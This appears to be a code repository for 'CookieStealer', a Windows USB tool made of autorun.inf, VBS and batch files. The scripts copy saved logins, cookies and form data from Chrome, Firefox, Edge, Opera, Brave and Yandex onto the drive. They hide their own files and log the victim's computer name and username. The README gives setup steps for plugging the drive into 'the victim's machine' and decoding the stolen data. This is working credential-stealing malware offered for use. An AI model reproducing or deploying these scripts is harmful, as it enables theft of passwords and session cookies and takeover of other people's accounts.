├── Icon.ico ├── addon.vbs ├── autorun.inf ├── Launch.bat ├── README.md └── file.bat /Icon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ledjajev/CookieStealer/HEAD/Icon.ico -------------------------------------------------------------------------------- /addon.vbs: -------------------------------------------------------------------------------- 1 | CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False -------------------------------------------------------------------------------- /autorun.inf: -------------------------------------------------------------------------------- 1 | [autorun] 2 | open=Launch.bat 3 | icon=Icon.ICO 4 | label=UsbDrive 5 | action=Run 6 | shell\open\command=Launch.bat 7 | [Content] 8 | MusicFiles=false 9 | PictureFiles=false 10 | VideoFiles=false -------------------------------------------------------------------------------- /Launch.bat: -------------------------------------------------------------------------------- 1 | ::This is the main file you must run on the 2 | color 4 3 | wscript.exe \addon.vbs file.bat 4 | md %~d0\adv\logs 5 | For /f "tokens=2-4 delims=/ " %%a in ('date /t') do (set mydate=%%c-%%a-%%b) 6 | For /f "tokens=1-3 delims=/:/ " %%a in ('time /t') do (set mytime=%%a-%%b-%%c) 7 | set mytime=%mytime: =% 8 | for /f "tokens=4-5 delims=. " %%i in ('ver') do set VERSION=%%i.%%j 9 | @echo Script Launched :: %mydate%_%mytime% :: %ComputerName% :: %USERNAME% :: %USERDOMAIN% :: Windows %version%>> \adv\logs\log 10 | @echo Script Launched, Date_Time: %mydate%_%mytime%, Device: %ComputerName% (Windows %version%), Username: %USERNAME%, UserDomain: %USERDOMAIN%>> \adv\logs\%ComputerName%_%mytime% 11 | color 2 12 | @echo Created logs. -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CookieStealer ``Windows PC Only`` 2 | Cookie Stealer for USB Drive Supports 4 browsers: `Yandex Browser`, `Chrome`, `Mozilla Firefox`, `Opera Browser`. `Brave`, `Edge` 3 | 4 | # What does it do: 5 | ``` 6 | 1. Clonning "Web Data", "Login Data", "Cookies" in \bin. 7 | 8 | 2. Hiding Directories. 9 | 10 | 3. Creates a logs in \adv\logs. 11 | ``` 12 | 13 | # Installation: 14 | ``` 15 | 1. Clone files from repository to the USB Drive (1GB Optimal capacity). 16 | 17 | 2. You can change the Icon (.ico only). 18 | 19 | 3. Set all files as Hidden excepting Launch.bat. 20 | 21 | 4. Everything is set, plug USB into the the victim's machine and run Launch.bat on it. 22 | ``` 23 | 24 | # Decoding: 25 | ``` 26 | You can use SQLiteSpy to decode the output files. 27 | ``` 28 | 29 | # Logging: 30 | Log file will contain this: ``Timestamp :: Device Name :: User :: UserDomain :: Windows Version``. 31 | -------------------------------------------------------------------------------- /file.bat: -------------------------------------------------------------------------------- 1 | set folderName=%ComputerName%_%mydate%_%mytime%_%USERNAME% 2 | @echo off 3 | For /f "tokens=2-4 delims=/ " %%a in ('date /t') do (set mydate=%%c-%%a-%%b) 4 | For /f "tokens=1-3 delims=/:/ " %%a in ('time /t') do (set mytime=%%a-%%b-%%c) 5 | set mytime=%mytime: =% 6 | md %~d0\bin\%folderName% 7 | md %~d0\bin\%folderName%\Mozilla 8 | md %~d0\bin\%folderName%\Opera 9 | md %~d0\bin\%folderName%\Google 10 | md %~d0\bin\%folderName%\Yandex 11 | md %~d0\bin\%folderName%\Brave 12 | md %~d0\bin\%folderName%\Edge 13 | echo off 14 | ATTRIB -R -A -S -H 15 | attrib +h %~d0\bin 16 | attrib +h %~d0\Icon.ico 17 | attrib +h %~d0\file.bat 18 | attrib +h %~d0\addon.vbs 19 | attrib +h %~d0\autorun.inf 20 | attrib +h %~d0\adv 21 | attrib +h %~d0\adv\logs 22 | CD/D %appdata%\Opera software\Opera stable\ 23 | copy /y "login data" %~d0\bin\%folderName%\Opera\ 24 | copy /y "Cookies" %~d0\bin\%folderName%\Opera\ 25 | copy /y "Web Data" %~d0\bin\%folderName%\Opera\ 26 | echo off 27 | CD/D %appdata%\Mozilla\Firefox\Profiles\*.default 28 | copy /y cookies.sqlite %~d0\bin\%folderName%\Mozilla 29 | copy /y key3.db %~d0\bin\%folderName%\Mozilla 30 | copy /y signons.sqlite %~d0\bin\%folderName%\Mozilla 31 | echo off 32 | CD/D %localappdata%\Google\Chrome\User Data\Default 33 | copy /y "Login Data" %~d0\bin\%folderName%\Google 34 | copy /y "Cookies" %~d0\bin\%folderName%\Google 35 | copy /y "Web Data" %~d0\bin\%folderName%\Google 36 | echo off 37 | CD/D %localappdata%\Yandex\YandexBrowser\User Data\Default\ 38 | copy /y "Ya Login Data" %~d0\bin\%folderName%\Yandex 39 | copy /y "Login Data" %~d0\bin\%folderName%\Yandex 40 | copy /y "Cookies" %~d0\bin\%folderName%\Yandex 41 | copy /y "Web Data" %~d0\bin\%folderName%\Yandex 42 | echo off 43 | CD/D %localappdata%\BraveSoftware\Brave-Browser\User Data\Default 44 | copy /y "Login Data" %~d0\bin\%folderName%\Brave 45 | copy /y "Cookies" %~d0\bin\%folderName%\Brave 46 | copy /y "Web Data" %~d0\bin\%folderName%\Brave 47 | echo off 48 | CD/D %localappdata%\Microsoft\Edge\User Data\Default 49 | copy /y "Login Data" %~d0\bin\%folderName%\Edge 50 | copy /y "Cookies" %~d0\bin\%folderName%\Edge 51 | copy /y "Web Data" %~d0\bin\%folderName%\Edge 52 | @echo off 53 | cls 54 | --------------------------------------------------------------------------------